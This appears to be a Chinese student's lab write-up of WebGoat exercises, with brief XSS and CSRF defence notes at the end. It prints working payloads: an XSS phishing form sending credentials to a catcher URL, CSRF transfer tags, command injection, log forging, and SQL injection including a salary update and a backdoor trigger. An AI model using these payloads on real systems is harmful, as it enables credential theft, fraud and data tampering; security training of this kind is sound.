标签:red cat text upd each 用户id 验证 NPU 自己
java -jar webgoat-container-7.1-exec.jar
localhost:8080/WebGoat
,进入WebGoat
开始实验在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点。我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添加一段JavaScript代码,读取受害人输入的用户名和密码,完整的XSS攻击代码如下:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单,如图所示:
<script>alert("20155233 attack succeed!");</script>
<script>alert("20155233 attack succeed!");</script>
,就会弹出对话框:存储型XSS是持久化的,代码是存储在服务器中,比较典型的例子就是上面所用的留言板;
反射型XSS攻击是非持久化的,应用的场景比如欺骗用户自己去点击链接才能触发XSS代码,也就是说它的代码是不存在服务器中的。
<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=500" width="1" height="1">
内容和前者相似,只不过这次需要确认转账,首先编辑内容<img src="http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=500" width="1" height="1">
在浏览器中输入URL:localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM
CONFIRM
按钮,再在浏览器中输入URL:http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM
,成功转走了5000元:BackDoors.help
旁边加上"& netstat -an & ipconfig"
:1=1
这种永真式即可达到我们的目的,利用firebug
,在任意一个值比如101
旁边加上or 1=1
:Columbia
,点Go
,可以看到所有天气数据:admin
的用户在日志中显示“成功登录”,在User Name
文本框中输入20155233%0d%0aLogin Succeeded for username: admin
,其中%0d
是回车,%0a
是换行符:‘ or 1=1 --
:GO
,可以查看到所以信息:‘ or 1=1 --
进行SQL注入:101; update employee set salary=100000
,成功把该用户的工资涨到了100000:101;CREATE TRIGGER lglBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘20155233@xx.com‘ WHERE userid = NEW.userid
创建一个后门,把表中所有的邮箱和用户ID都设为我的:XSS攻击的原理,如何防御?
XSS的防御可以从以下两方面来进行: 一种方法是在表单提交或者url参数传递前,对需要的参数进行过滤;检查用户输入的内容中是否有非法内容,如尖括号、引号等,严格控制输出。
CSRF攻击原理,如何防御?
对于CSRF的防御也可以从以下几个方面入手:通过referer、token或者验证码来检测用户提交;尽量不要在页面的链接中暴露用户隐私信息,对于用户修改删除等操作最好都使用post操作;避免全站通用的cookie,严格设置cookie的域。
标签:red cat text upd each 用户id 验证 NPU 自己
原文地址:https://www.cnblogs.com/l20155233/p/9084869.html